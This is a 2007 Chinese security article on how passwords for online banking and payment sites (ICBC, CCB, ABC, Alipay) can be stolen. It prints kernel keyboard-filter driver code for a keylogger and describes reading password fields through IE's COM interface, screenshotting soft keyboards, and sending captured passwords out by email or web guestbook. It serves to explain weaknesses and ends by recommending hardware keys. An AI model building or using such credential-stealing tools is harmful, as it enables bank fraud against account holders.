至顶网›网络频道 ›电子支付平台的WEB登陆安全性简要分析

电子支付平台的WEB登陆安全性简要分析

扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条

现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额，并建议用户使用动态口令卡或者USB Key，总体安全系数有所提高。

作者：赛迪网来源：赛迪网技术社区 2007年10月12日

关键字：

NTSTATUS HookKeyboard(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT pKeyboardDeviceObject;
NTSTATUS status = IocreateDevice
(pDriverObject,sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD,
 0, true, &pKeyboardDeviceObject);
pKeyboardDeviceObject->Flags = pKeyboardDeviceObject->
Flags | (DO_BUFFERED_IO | DO_POWER_PAGABLE);
pKeyboardDeviceObject->Flags=pKeyboardDeviceObject->
Flags& ~DO_DEVICE_INITIALIZING;
RtlZeroMemory(pKeyboardDeviceObject->DeviceExtension, 
sizeof(DEVICE_EXTENSION));
PDEVICE_EXTENSION pKeyboardDeviceExtension=(PDEVICE_EXTENSION)
pKeyboardDeviceObject->DeviceExtension;
CCHAR ntNameBuffer[64] = "\\Device\\KeyboardClass0";
STRING ntNameString;
UNICODE_STRING uKeyboardDeviceName;
RtlInitAnsiString( &ntNameString, ntNameBuffer );
RtlAnsiStringToUnicodeString( &uKeyboardDeviceName,
 &ntNameString, TRUE );
IoAttachDevice(pKeyboardDeviceObject,&uKeyboardDeviceName,
&pKeyboardDeviceExtension->pKeyboardDevice);
RtlFreeUnicodeString(&uKeyboardDeviceName);
return STATUS_SUCCESS;
}

下面以工商银行的网上银行为例，演示我们的程序。为了演示，我们的驱动程序将实时打印出获得的键盘记录的信息，并且把完整的信息记录到磁盘文件上。招商银行、阿里巴巴支付宝等效果等同，支付密码用此法同样能截取。截取时实时打印的信息记录到文件里的完整信息。合发送邮件或者ASP/PHP留言的方式我们就能远程的得到密码。

2、采取动态软键盘的

典型代表有：中国建设银行、中国银行、中国农业银行采用动态软键盘技术初看确实能使攻击者无法截获密码，但是截取密码的方法不仅仅是接截获键盘记录一种方法。我们可以通过IE的COM获取的密码。

对于中国建设银行，通过IE的COM接口获取的密码框里的内容就是密码，其他大部分采用软键盘技术的网站大都也是这样。但是中国农业银行WEB程序中做了一点处理，通过鼠标点击软键盘传入密框的内容不是实际密码而是按钮序号，所以我们只要枚举当前窗口，发现是中国农业银行的网上银行页面时，我们的程序就自动截图发给我们，我们根据所截获得的图象和通过IE的 COM接口所获得的序号伪密码之间的关系进行转换（抽象为一个简单的函数映射），很容易的。这样便获得了农行网上银行的密码。下面是截取中国建设银行网上银行密码的演示截图，利用动态软键盘的其他网站效果相同。（衍生：对付应用程序的部分软键盘可以运用Hook TextOutW/A的类似屏幕取词的方法来截取。）

后记

尽管网上银行等电子支付平台在密码防盗方面做了安全考虑，但是还是不够安全。不过大家也大可不必因此不使用网上银行，采取数字证书以及USB Key（比如U盾)等安全措施相对而言还是比较安全的。

VIP专区

VIP用户

普通用户

邮件订阅

如果您非常迫切的想了解IT领域最新产品与技术信息，那么订阅至顶网技术邮件将是您的最佳途径之一。

重磅专题

往期文章

电子支付平台的WEB登陆安全性简要分析

业界热点: